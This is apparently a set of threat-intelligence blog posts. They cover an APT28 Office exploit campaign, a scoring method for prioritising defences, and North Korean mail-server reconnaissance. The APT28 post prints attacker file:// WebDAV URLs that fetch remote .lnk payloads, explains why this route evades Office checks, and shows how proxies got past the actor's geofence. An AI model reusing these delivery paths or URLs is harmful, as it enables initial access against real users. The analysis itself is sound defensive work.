APT28: Geofencing as a Targeting Signal (CVE-2026-21509 Campaign)

by Robin Dost


Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.

This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents, and how the actor's own geofencing can be leveraged to infer operational target regions.

Before diving into the analysis, a brief look at CVE-2026-21509 itself.

Understanding CVE-2026-21509

CVE-2026-21509 is a Microsoft Office vulnerability affecting how embedded OLE objects are validated during document processing.
Microsoft classifies it as a security feature bypass, which is accurate, but undersells the actual problem.
Office makes trust decisions based on internal object metadata that originates directly from the document itself.
The vulnerability does not rely on macros, scripts or external templates; it is triggered during normal parsing of specially crafted RTF documents.
From a user perspective, the document appears inert. There are no prompts, no warnings and nothing that would suggest active content.
The exploit uses RTF control words such as \object and \objdata to embed raw binary data inside the document.
During parsing, Word reconstructs this data into in-memory OLE structures, effectively rebuilding Composite File Binary objects on the fly. This reconstruction step is where the vulnerability is exposed.
The reconstructed OLE objects are deliberately malformed. Their headers look plausible, but their internal structure is inconsistent. Strict parsers reject them. Word does not. It continues processing and enters code paths that assume a coherent internal state.
Observed samples frequently use OLE Package objects and legacy COM class identifiers associated with historically risky components.
By manipulating how these objects are represented internally, the exploit bypasses the Office checks meant to block them, not by disabling protections, but by misleading the logic that decides whether those protections apply.
The document itself contains no payload. Its sole purpose is to reach a state where Office processes an object it should not trust.
Any follow-on activity happens later and outside the document.
This separation between exploit and payload fits well with current intrusion chains.

From a defensive POV, this explains why CVE-2026-21509 is easy to miss.
Static analysis shows no macros, no external relationships and no obvious indicators.
The malicious structures only exist after Word reconstructs them, which places the exploit below the visibility of most document scanning and macro-focused controls.

tl;dr

CVE-2026-21509 is a Microsoft Office vulnerability that allows attackers to bypass internal security checks when Word processes embedded OLE objects.
The issue is triggered during normal document parsing and does not rely on macros, scripts or external content.
A specially crafted RTF document embeds malformed OLE objects that Word reconstructs in memory.
Office then makes security decisions based on this reconstructed data, even though it originates from the untrusted document.
By manipulating that data, an attacker can cause Word to accept and process objects that should normally be blocked.

The document itself contains no payload and appears harmless under static analysis. Exploitation happens entirely inside Word's parsing and object handling logic, below the level where most document scanners operate.

Analyzed Samples

For this analysis, I looked at the following samples:

  • c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f
  • 5a17cfaea0cc3a82242fdd11b53140c0b56256d769b07c33757d61e0a0a6ec02
  • b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546
  • fd3f13db41cd5b442fa26ba8bc0e9703ed243b3516374e3ef89be71cbf07436b
  • 969d2776df0674a1cca0f74c2fccbc43802b4f2b62ecccecc26ed538e9565eae

When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.

In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.

This is expected.

The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.

oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.

The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of Word's parsing logic by extracting and rebuilding the embedded objects from the RTF stream.

rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc

Once reconstructed, the embedded objects are clearly malformed. They resemble OLE containers but fail validation by strict parsers, which is exactly the condition the vulnerability relies on.
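To illustrate what rtfobj does under the hood, here is a minimal, stdlib-only sketch of the reconstruction step: locating \objdata control words and decoding the hex that follows them back into binary. The sample RTF fragment is synthetic (it only embeds the OLE magic bytes), and the function names are mine; for real documents, use rtfobj itself, which handles obfuscated and malformed hex far more robustly.

```python
import re
import binascii

# OLE/CFB containers start with this magic once the hex is decoded.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def extract_objdata(rtf_text):
    """Decode the hex blobs following \\objdata control words in an RTF body."""
    blobs = []
    for match in re.finditer(r"\\objdata\b([0-9a-fA-F\s]+)", rtf_text):
        hexdata = re.sub(r"\s+", "", match.group(1))
        if len(hexdata) % 2:          # tolerate truncated dumps
            hexdata = hexdata[:-1]
        blobs.append(binascii.unhexlify(hexdata))
    return blobs

# Synthetic example: a fragment embedding the OLE magic as hex.
sample = r"{\rtf1{\object\objemb{\*\objdata d0cf11e0a1b11ae100}}}"
for blob in extract_objdata(sample):
    print(blob.startswith(OLE_MAGIC))   # True for a reconstructed OLE header
```

The point of the sketch: before this decoding step, the embedded object is just ASCII hex, which is exactly why container-level tools like oleid see nothing.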


After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.

From this data, the following strings could be extracted:


file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org/buch/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org@ssl/cz/Downloads/document.LnK?init=1
file://freefoodaid.com@80/documents/2_2.lNk?init=1


Why file://…/davwwwroot/...lnk is used

Paths like
file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk?init=1
are chosen to force specific Windows and Office code paths.

Using file:// changes how Office interprets the access. The resource is treated as a file system object, not as web content. This affects which security checks are applied and how trust is evaluated.
Mark-of-the-Web handling and web-centric protections do not apply in the same way as they would for http or https.
The davwwwroot path forces WebDAV.
This causes Windows to access the resource via the WebClient service, exposing the remote content as a network-like file system.
WebDAV remains a special case in Windows, where remote files are often handled similarly to local or SMB resources.
The .lnk file is the actual target.
The Word document contains no payload and performs no execution itself.
Its sole purpose is to reach a state where access to the remote resource is allowed.
Shortcut files are attractive because they can execute commands or load further components while being subject to different checks than executables or scripts, especially when accessed through WebDAV.
The query parameter is client-side only.
It is used to avoid caching and to reliably trigger initial access behavior. It has no functional relevance for the server.
In the context of CVE-2026-21509, this fits cleanly.
The vulnerability causes Office to make incorrect trust decisions during document parsing.
Once that decision is made, accessing a remote shortcut via a file:// WebDAV path becomes possible without macros, scripts or explicit downloads.

Identifying Targets

While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:

  • /cz/ -> Czech Republic
  • /buch/ -> Bucharest / Romania
  • /pol/ -> Poland
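Extracting these hints can be done mechanically once the URLs are recovered. A small sketch, with the segment-to-region mapping reproduced from the list above (the helper name is mine):

```python
from urllib.parse import urlparse

# Path-segment hints observed in the extracted URLs.
REGION_HINTS = {
    "cz": "Czech Republic",
    "buch": "Romania (Bucharest)",
    "pol": "Poland",
}

def region_hints(url):
    """Return the target-region hints encoded in a delivery URL's path."""
    segments = urlparse(url).path.strip("/").split("/")
    return [REGION_HINTS[s] for s in segments if s in REGION_HINTS]

urls = [
    "file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.LnK?init=1",
    "file://wellnessmedcare.org@ssl/cz/Downloads/document.LnK?init=1",
]
for u in urls:
    print(u, "->", region_hints(u))
```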

Additional indicators inside the Word documents further support this assessment:

  • Romanian language content
  • References to Ukraine
  • Mentions of Slovenia
  • EU-related context

None of this is accidental.

At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^

Turning Geofencing into Intelligence

The first step was to take a closer look at the domains extracted from the samples:

  • wellnessmedcare.org -> 193.187.148.169
  • freefoodaid.com -> 159.253.120.2

What stands out here is the choice of hosting locations.
Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaign's intended target regions.

Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior.
To do this, I executed the document in a sandbox and captured the resulting network traffic.

Geofence Analysis

To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked.
After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.

Without proxy:

With proxy:

The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.

Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.
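The per-country sweep boils down to issuing the same request through exit points in different regions and classifying the response. A stdlib-only sketch of that logic (my custom script is not reproduced here; the proxy address below is a placeholder, not a real endpoint):

```python
import urllib.request
import urllib.error

def probe(url, proxy=None, timeout=10):
    """Return the HTTP status code for `url`, optionally via an HTTP proxy."""
    handlers = []
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    opener = urllib.request.build_opener(*handlers)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code            # e.g. 403 from the geofence

def geofence_allows(status):
    """The observed geofence rejects out-of-region requests with HTTP 403."""
    return 200 <= status < 300

# Hypothetical usage, comparing a direct request with a Romanian exit:
# direct = probe("http://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk")
# via_ro = probe("http://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk",
#                proxy="http://ro-exit.example:8080")
```

Iterating this over one proxy per country yields the allow-list described below.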

As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actor's operational focus if you know where to look.
The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.

How to protect against these attacks

Update Microsoft Office and enforce a structured update routine.
Treat unexpected Word documents as untrusted and have them analyzed before opening them.
(or stop using windows :3)

Conclusion

CVE-2026-21509 works because it fits neatly into how Office processes documents today.
The exploit relies on internal object reconstruction, not on macros or embedded payloads, which makes it easy to overlook during initial analysis.
The surrounding tradecraft follows a familiar pattern.
WebDAV paths, remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns.
The technique is stable, requires little user interaction and avoids most of the controls that organizations typically rely on.
At the same time, this setup exposes useful signals.
Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.
In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.

From an analytical perspective, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.

Actor-Centric Defensive Prioritization (ACDP)

by Robin Dost

Introduction

Much of my previous work has focused on understanding threat actors not through individual malware samples alone, but through infrastructure, operational behavior, and strategic intent. Over time, a recurring problem became increasingly difficult to ignore:

While our visibility into attacker tradecraft continues to improve, our ability to decide what to defend first often does not.

Most security frameworks excel at describing what exists (techniques, controls, and best practices) but remain largely silent on what should matter most when resources are limited or when a specific threat actor becomes relevant.
Instead of introducing another generic framework, this article applies an actor-centric prioritization methodology focused on attacker intent and impact.
This approach emerged from a practical need I repeatedly encountered: organizations often had technically sound controls in place, yet still failed to prevent strategic loss, because their defensive investments were misaligned with the attacker's actual objectives.

Why ACDP Was Developed

Actor-Centric Defensive Prioritization (ACDP) was developed to address a persistent gap between threat intelligence and defensive decision-making.

Threat intelligence typically answers questions such as:

  • Who is active?
  • What techniques are being used?

Defensive planning, however, must answer different questions:

  • What failure would be unacceptable?
  • Which controls meaningfully disrupt this actor's strategy?

In real world environments, especially those facing state-aligned or destructive actors, it is rarely feasible to implement every recommended control simultaneously.
Prioritization becomes inevitable.

ACDP exists to make that prioritization explicit, defensible, and actor-aware.

What Makes This Approach Different

ACDP does not attempt to replace established frameworks such as MITRE ATT&CK or NIST.
Instead, it operates one level above them, using their outputs as inputs.

Its defining characteristic is a deliberate shift in perspective:

  • from technique coverage to strategic disruption
  • from static maturity models to adaptive decision-making
  • from generic best practices to context-driven trade-offs

The result is a reasoned ordering of defensive actions, based on how much they interfere with an adversary's intent and how much damage they prevent if that interference fails.

Advantages of an Actor-Centric Approach

The strengths of ACDP are primarily practical:

  • ACDP enables rapid reprioritization when threat actor relevance changes
  • It aligns defensive investment with attacker objectives instead of abstract risk scores
  • It acknowledges budget and operational constraints instead of assuming ideal conditions
  • It helps explain why certain controls take priority, a critical factor in both technical and executive discussions

Most importantly: ACDP encourages organizations to think in terms of losing conditions, not only detection coverage.

Limitations and Trade-Offs

ACDP is not without drawbacks.

Because it is actor-centric, its effectiveness depends on the quality of the underlying threat intelligence.
Incorrect assumptions about attacker intent can lead to misplaced priorities.
Additionally, ACDP does not provide prescriptive control definitions or implementation guidance. It assumes foundational security hygiene already exists and focuses solely on ordering, not designing, defensive measures.
Finally, ACDP deliberately avoids the comfort of exhaustive coverage. It forces uncomfortable decisions, choosing what not to prioritize, which may challenge existing security narratives.

A Practical Motivation

The motivation behind ACDP is operational necessity.

In environments where time, budget, and certainty are constrained, security decisions must be made before all information is available. ACDP provides a structured way to make those decisions without pretending that all risks are equal.

If defensive priorities do not change when attacker intent changes, prioritization is no longer strategic.

ACDP in Practice: Quantified Prioritization Example

This section demonstrates how ACDP produces concrete priorities, using a scoring example against Sandworm.

Step 0: Define the Objective Profile

Based on historical and current operations, Sandworm is modeled as a:

Destructive, state-aligned actor prioritizing strategic impact over access longevity

This assumption directly influences weighting.

Step 1: Define the Scoring Axes

Each defensive control is evaluated across four axes.

Axis A: Actor Disruption Value (ADV)

How strongly does this control interfere with the actors campaign strategy?

Score  Meaning
5      Breaks or invalidates the strategy
4      Forces significant tradecraft change
3      Causes friction
2      Minor inconvenience
1      Negligible effect

Axis B: Impact Risk Reduction (IRR)

How much real damage does this control prevent if the actor succeeds elsewhere?

Score  Meaning
5      Prevents catastrophic / irreversible impact
4      Strongly limits blast radius
3      Partial damage reduction
2      Minimal reduction
1      Cosmetic

Axis C: Cost & Operational Complexity (CC)

How realistic is implementation under time and budget pressure?

Score  Meaning
5      Low cost, low friction
4      Moderate effort
3      Manageable complexity
2      High effort
1      Very expensive / disruptive

Axis D: Detection-to-Decision Time (DDT)

Does this control provide usable signal early enough to change outcomes?

Score  Meaning
5      Immediate / pre-impact
4      Early warning
3      Delayed but actionable
2      Mostly reactive
1      Post-incident only

Step 2: Actor-Specific Weighting

For a destructive actor, impact prevention and strategic disruption dominate:

  • ADV = 35%
  • IRR = 35%
  • CC = 15%
  • DDT = 15%

Step 3: Scoring Selected Controls

Candidate Controls

  • Immutable offline backups
  • VPN / edge device inventory & patch SLAs
  • Historical DNS & infrastructure analysis
  • PowerShell command-line logging
  • Scheduled task auditing
  • Security awareness training

Scoring Table

Control                     ADV  IRR  CC  DDT
Immutable offline backups    5    5    3   5
Edge inventory & patching    4    4    4   4
Historical DNS analysis      4    3    4   4
PowerShell logging           3    2    4   3
Scheduled task auditing      3    2    3   3
Awareness training           1    1    5   1

Step 4: Priority Index Calculation

Formula

PI = (ADV × 0.35) + (IRR × 0.35) + (CC × 0.15) + (DDT × 0.15)

Example Calculations

Immutable offline backups

(5×0.35) + (5×0.35) + (3×0.15) + (5×0.15) = 4.70

PowerShell logging

(3×0.35) + (2×0.35) + (4×0.15) + (3×0.15) = 2.80
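The full table can be ranked with a few lines of code. A minimal sketch, with the weights from Step 2 and the scores from the table above (the PI values follow mechanically from the formula):

```python
WEIGHTS = {"ADV": 0.35, "IRR": 0.35, "CC": 0.15, "DDT": 0.15}

# (ADV, IRR, CC, DDT) per control, taken from the scoring table.
CONTROLS = {
    "Immutable offline backups": (5, 5, 3, 5),
    "Edge inventory & patching": (4, 4, 4, 4),
    "Historical DNS analysis":   (4, 3, 4, 4),
    "PowerShell logging":        (3, 2, 4, 3),
    "Scheduled task auditing":   (3, 2, 3, 3),
    "Awareness training":        (1, 1, 5, 1),
}

def priority_index(adv, irr, cc, ddt):
    """PI = (ADV x 0.35) + (IRR x 0.35) + (CC x 0.15) + (DDT x 0.15)"""
    return (adv * WEIGHTS["ADV"] + irr * WEIGHTS["IRR"]
            + cc * WEIGHTS["CC"] + ddt * WEIGHTS["DDT"])

ranked = sorted(CONTROLS.items(),
                key=lambda kv: priority_index(*kv[1]), reverse=True)
for name, scores in ranked:
    print(f"{name:28s} PI = {priority_index(*scores):.2f}")
```

Changing the weights for a different actor profile (e.g. an espionage-focused actor valuing access longevity) immediately reorders the list, which is exactly the adaptive behavior ACDP is after.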

Step 5: Final Prioritization

Control                     PI    Priority Tier
Immutable offline backups   4.70  Tier 1
Edge inventory & patching   4.00  Tier 1
Historical DNS analysis     3.65  Tier 2
PowerShell logging          2.80  Tier 2
Scheduled task auditing     2.65  Tier 3
Awareness training          1.60  Tier 4

Step 6: Interpretation

The results highlight several non-obvious truths:

  • Recovery capability outranks detection
  • Infrastructure hygiene outranks user behavior
  • Controls that look impressive may rank low
  • Controls that feel boring often dominate

This is basically the mathematical expression of attacker intent.

Why the Calculation Matters

Without explicit scoring:

  • prioritization becomes opinion
  • decisions become political
  • trade-offs remain implicit

ACDP forces those trade-offs into the open.

If you cannot explain your priorities numerically, you are not prioritizing: you are rationalizing.

Closing Thoughts

Security failures are often caused not by missing controls, but by misaligned priorities.
ACDP was developed to address this misalignment by shifting the focus from technique coverage to attacker intent, and from abstract risk to tangible impact. Its value lies in deliberate selection.
Used correctly, ACDP does not replace existing frameworks, but sharpens them by forcing uncomfortable but necessary decisions.
This methodology is intentionally opinionated!


If you have any feedback or questions, please feel free to contact me by email.
I welcome criticism and feedback!

Why Is a North Korean Mail Server Using a .cc Domain? – Threat Intelligence Beyond Malware


by Robin Dost

Today I stumbled over a rather accidental finding during a routine analysis of North Korean infrastructure that I would like to share with you.
Since North Korea does not exactly use the internet for legitimate purposes and is well known for a long history of attacks against (critical) infrastructure, I consider it reasonable to treat essentially all North Korean internet-facing infrastructure as a threat entity by default. Infrastructure changes often reveal far more about a threat actor than individual malware samples ever will, and the same applies to nation states like North Korea. That is precisely why this infrastructure deserves continuous observation.

For clarity: no offensive actions were performed during this analysis. Everything shown here is based exclusively on publicly accessible data and very basic reconnaissance.
Even if the target happens to be North Korean infrastructure, operating within legal boundaries remains mandatory. Germany unfortunately does not always make this easy, but whatever.

Enough about that. Let’s get into the analysis.

Initial Discovery

Due to a historic DNS leak, we currently have a surprisingly large collection of publicly reachable websites hosted inside North Korea. I scanned these sites for email addresses because I was curious about the current state of their mail infrastructure. I had looked into this years ago but lost track of it over time. Back then, heavy geofencing was common and many services were blocked outright, so the obvious question was whether this still applies today (it does not).

For this quick assessment, I focused on two sites:

Both pages expose email addresses:

The addresses
ryongnamsan@star-co.net.kp and
mab@silibank.net.kp
point to the domains star-co.net.kp and silibank.net.kp.

If these addresses are actively used, we should also find corresponding mail servers.

Indeed, this yields four SMTP hosts worth inspecting:

  • smtp.star-co.net.kp
  • smtp1.star-co.net.kp
  • mail.star-co.net.kp
  • mail.silibank.net.kp

I verified reachability on the typical mail ports (25, 465, 587).

smtp.star-co.net.kp
smtp1.star-co.net.kp
mail.star-co.net.kp (offline)
mail.silibank.net.kp


Mailserver             IP Address      Open Mail Ports  Running
smtp.star-co.net.kp    175.45.178.56   25, 587          Postfix
smtp1.star-co.net.kp   175.45.178.57   25, 587          Postfix
mail.star-co.net.kp    175.45.178.55   none (offline)   Postfix
mail.silibank.net.kp   175.45.177.33   25               Postfix
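A reachability sweep like this is easy to script. A minimal stdlib sketch (the helper name is mine; the commented-out loop shows the intended usage against the hosts above):

```python
import socket

MAIL_PORTS = (25, 465, 587)

def open_mail_ports(host, ports=MAIL_PORTS, timeout=5):
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    reachable = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                reachable.append(port)
        except OSError:
            pass  # refused, filtered, or timed out
    return reachable

# for host in ("smtp.star-co.net.kp", "smtp1.star-co.net.kp",
#              "mail.star-co.net.kp", "mail.silibank.net.kp"):
#     print(host, open_mail_ports(host))
```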


So far, nothing spectacular, until we look at the TLS certificate.

The Certificate That Shouldn't Exist (At Least Not Like This)

The full certificate is reproduced below:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 4096 (0x1000)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=KP, ST=Pyongyang, L=Junggu, O=DevelopTeam, CN=StarJV Certificate Authority, emailAddress=postmaster@star-co.net.kp
        Validity
            Not Before: Nov 23 08:48:45 2024 GMT
            Not After : Nov 23 08:48:45 2027 GMT
        Subject: C=KP, ST=Pyongyang, L=Junggu, O=StarJVC, OU=DevelopTeam, CN=mail.nisp.cc, emailAddress=postmaster@star-co.net.kp
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ad:82:f5:13:18:cd:33:41:c6:c4:36:b2:55:33:
                    5a:e3:e3:d7:3a:a5:34:78:2f:96:60:41:83:e5:7f:
                    13:cd:fc:97:a2:dd:86:92:3d:f6:ce:bd:fd:ac:73:
                    ad:79:5c:52:8d:c4:2f:be:39:c9:a8:17:b8:a0:f2:
                    85:42:03:5a:26:95:dc:ce:15:ec:80:fa:16:56:2e:
                    bc:cf:89:f6:5a:ad:d9:60:18:17:3b:a3:63:62:3f:
                    8b:96:33:ad:86:f5:af:3b:73:d2:17:eb:20:9d:84:
                    89:03:2a:97:e5:a6:c2:2a:75:ef:1d:04:2b:16:92:
                    ff:50:95:87:a3:d1:df:5f:e0:0e:5b:1a:86:5d:e7:
                    23:90:7a:b2:33:6d:d1:7e:49:2b:c0:bf:25:95:b7:
                    37:e0:83:0a:85:96:04:35:1b:e6:35:fd:b9:c1:08:
                    39:f8:92:7f:1b:c9:f6:84:d5:07:7d:64:65:a5:58:
                    76:09:f4:e0:4e:6c:bc:19:bb:a8:09:5c:90:db:5d:
                    1c:43:79:35:b1:8f:15:d2:df:b4:b0:89:d4:32:e3:
                    37:4f:ad:51:5c:49:94:6f:99:22:19:d0:c2:37:cf:
                    1c:76:8c:d0:45:7d:5c:79:74:f3:2a:49:d3:5c:f6:
                    d9:4f:d8:f5:fd:d7:4c:b5:0c:d6:17:72:22:44:0a:
                    30:65
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        4e:d0:bd:4a:89:48:95:2a:58:51:2e:7e:52:53:87:8c:ed:a9:
        ed:1a:ea:b8:0a:53:75:bb:d1:3b:7f:25:76:b6:f9:bb:38:fe:
        d9:07:96:ff:2e:af:58:8e:8c:7e:a5:3d:8a:a1:bc:82:ab:8f:
        39:b9:bf:37:03:1e:6e:40:8f:59:ac:29:e3:46:4a:2e:fb:b3:
        59:29:fa:b3:e3:ba:e8:6e:3d:31:a7:ab:41:66:9b:42:8a:98:
        65:94:53:bc:24:5c:3d:83:dc:cb:15:64:02:80:7c:2a:31:c1:
        f3:18:70:d9:82:54:14:bf:b2:33:d4:d8:61:53:56:d8:06:f6:
        e7:b8:15:03:b4:0c:a3:13:f6:fd:0d:08:a0:50:b8:b8:a4:a7:
        1f:d1:a2:56:ba:6e:b8:c4:cf:18:c6:f0:11:f5:18:6b:df:d5:
        91:e0:41:30:35:96:4c:34:1b:25:c1:01:69:f7:b2:d2:36:c9:
        2d:10:a7:81:c2:bb:b4:b0:38:99:9b:81:7d:bd:30:9f:e6:d7:
        f0:c1:0b:cb:b6:ef:fe:34:94:7a:cd:40:f7:56:87:87:fb:50:
        39:d9:4a:1b:78:f9:81:ff:a0:54:b4:8f:90:21:c0:0c:50:73:
        1b:78:59:31:06:fb:d9:d9:0d:43:f3:b9:b8:63:2e:a7:cc:86:
        bf:cb:22:67:a8:7d:af:ee:68:41:ab:f3:53:7f:b0:fd:d5:bf:
        6c:18:9e:db:b4:ab:23:39:78:93:69:7f:95:a3:9f:dd:3a:14:
        f1:16:32:b6:83:58:e2:34:d2:e2:49:04:aa:21:62:20:e3:2a:
        28:b0:9d:8d:6a:6f:0d:f6:9f:5c:c6:11:51:56:93:35:82:19:
        bd:af:81:bc:ff:6e:30:57:37:fc:cb:fa:20:01:de:c4:66:2c:
        f7:44:d5:9e:b8:9c:d9:f4:8e:99:68:4d:47:b6:d4:5b:05:8d:
        9f:d6:6f:8c:6e:8d:8a:d8:ab:4b:63:8d:e3:5b:65:81:e5:3a:
        79:82:f2:00:c4:54:57:e1:00:f2:1b:22:59:41:71:df:49:89:
        76:c7:01:54:70:35:4b:25:fa:1e:95:a5:4e:82:e2:ef:c8:e3:
        b2:c0:5c:7b:bb:28:6f:0c:db:48:5f:4b:70:96:5c:df:f4:7c:
        e7:42:f1:82:f6:99:6e:db:de:c7:e7:ff:01:f8:1a:84:62:2e:
        1d:e2:11:b1:ba:f0:b0:c2:a7:2f:36:27:4d:fb:ed:c9:4b:42:
        c3:bd:cf:b3:65:99:67:68:38:1d:eb:fe:2a:c7:b9:62:80:a3:
        f5:f2:b2:c1:0f:53:7c:06:ed:61:7e:b8:e6:fc:89:36:ea:c0:
        5b:2f:6d:6d:88:48:30:9a

Several anomalies immediately stand out:

External Identity Domain (mail.nisp.cc)

Observations

  • TLS CN = mail.nisp.cc
  • Domain is outside of .kp
  • No MX records exist
  • The domain appears to be used purely for identity, not routing

According to WHOIS (if we trust it), the domain was registered in 2025 via juming.com, a registrar I would generously describe as “economically efficient” rather than reputable.

Beyond that, there is essentially no public footprint for this domain.

Inference

There appears to be a deliberate separation between:

  • Routing identity: .kp domains
  • Cryptographic identity: .cc domain

In my opinion, this is a deliberate architectural decision, not an accident.

Private State PKI (StarJV Certificate Authority)

Observations

  • Custom internal CA visible in the certificate
  • Not publicly trusted
  • Self-managed
  • Extremely primitive X.509 v1 structure

Inference

  • Active internal PKI operation
  • Low compliance and security maturity
  • No external trust anchor available or desired

X.509 Version 1 Certificate

Observations

  • Certificate is Version 1 (no extensions, no SAN, no policy constraints)

Inference

  • Outdated or minimal PKI toolchain
  • No modern security modeling
  • Functionality prioritized over governance

Primitive Serial Number (0x1000)

Observations

  • Serial number equals exactly 4096

Inference

  • Manual or simplistic CA automation
  • No randomness
  • Likely very small PKI scale

Multi-Identity on a Single Host

Observations

  • PTR: ryongnamsan.edu.kp
  • SMTP banner: star-co.net.kp
  • TLS CN: mail.nisp.cc

Inference

  • Central gateway role
  • Multi-tenant usage
  • Organizational consolidation

No MX Records for nisp.cc

Observations

  • Domain exists, but has no mail routing

Inference

  • Domain serves exclusively as an identity anchor
  • No end-user mail usage
  • Reduced abuse exposure

Extremely Large Mail Size (~10 GB)

Observations

SMTP SIZE = 10,000,000,000 bytes

Honestly, I laughed out loud when I saw this.

This configuration appears consistently on both active Star-CO SMTP servers (smtp and smtp1.star-co.net.kp), which suggests it is intentional rather than a misconfiguration. In contrast, the Silibank mail server uses a much more reasonable limit of ~100 MB.
It is therefore reasonable to assume that these mail servers are being used to transfer very large files. In theory, this could even serve as a transport channel for bulk data movement, including data returning from North Korean remote workers abroad. This remains speculative, but the transport capacity itself is undeniable.
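The SIZE limit (like VRFY and ETRN below) is advertised in the server's EHLO response; Python's smtplib exposes the same data via `esmtp_features` after an `ehlo()` call. A small offline sketch of parsing such a banner, using a reconstructed example shaped like the Star-CO response:

```python
def parse_ehlo(response):
    """Parse a multi-line EHLO response into {extension: argument}."""
    features = {}
    for line in response.splitlines():
        body = line[4:].strip()          # drop the "250-" / "250 " prefix
        if not body:
            continue
        keyword, _, arg = body.partition(" ")
        features[keyword.upper()] = arg
    return features

# Reconstructed example banner (not a verbatim server capture).
ehlo = "250-smtp.star-co.net.kp\n250-SIZE 10000000000\n250-VRFY\n250 ETRN"
feats = parse_ehlo(ehlo)
print(int(feats["SIZE"]) / 1e9, "GB")   # -> 10.0 GB
```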

If you ever want to make yourself vulnerable to a denial-of-service attack, feel free to implement this feature yourself!

Inference

  • Expectation of large payload transfers
  • SMTP likely used as a general-purpose transport channel
  • No restrictive transport policies

Legacy Features Enabled (VRFY, ETRN)

Observations

  • User verification enabled
  • Legacy store-and-forward mechanisms active

Inference

  • Weak hardening discipline
  • Legacy configuration not cleaned up
  • Reliance on network isolation as primary security model

Unknown SMTP Extension (BBBBBBBB)

Observations

  • Non-standard SMTP extension

Inference

  • Bug, custom patch, or QA deficiency
  • Poor implementation hygiene

Recent Activity (Domain 2025 / Certificate 2024)

Observations

  • Domain registered recently
  • Certificate relatively fresh

Inference

  • Active modernization or reorganization
  • Not a purely legacy environment
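The structural checks walked through above can be collected into a small triage helper. This is a sketch under my own assumptions (function name and finding wording are mine); the input values in the example are taken from the certificate dump:

```python
def cert_anomalies(version, serial, cn, issuer_domain):
    """Flag the structural oddities discussed above for a parsed certificate."""
    findings = []
    if version == 1:
        findings.append("X.509 v1: no extensions, no SAN, no policy constraints")
    if serial < 2**20 and serial & (serial - 1) == 0:
        findings.append(f"low power-of-two serial ({serial:#x}): manual/simplistic CA")
    cn_tld = cn.rsplit(".", 1)[-1]
    issuer_tld = issuer_domain.rsplit(".", 1)[-1]
    if cn_tld != issuer_tld:
        findings.append(f"identity split: CN under .{cn_tld}, issuer contact under .{issuer_tld}")
    return findings

# Values taken from the certificate above.
for f in cert_anomalies(1, 0x1000, "mail.nisp.cc", "star-co.net.kp"):
    print("-", f)
```

All three checks fire for this certificate, which is what makes it such a dense signal.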

Temporal Correlation & Strategic Context

We do not perform this kind of analysis purely for entertainment value. The objective is to generate intelligence that may become operationally relevant over time. That means we also need to ask why these infrastructure changes occurred when they did.

Based on available timestamps:

  • Certificate issuance: 23 Nov 2024
  • Domain registration: 21 Aug 2025

November 2024: Certificate Issuance

This period coincides with a phase of increased North Korean geopolitical activity:

  • Formalization of a comprehensive strategic partnership with Russia
  • Ongoing missile testing and military signaling
  • Escalating rhetoric toward South Korea, the US, and Japan
  • Partial reopening of diplomatic channels post-pandemic

Interpretation

The certificate appears to have been issued ahead of this intensified phase. A plausible explanation is preparatory technical groundwork: stabilizing externally reachable infrastructure before increased international activity or visibility.

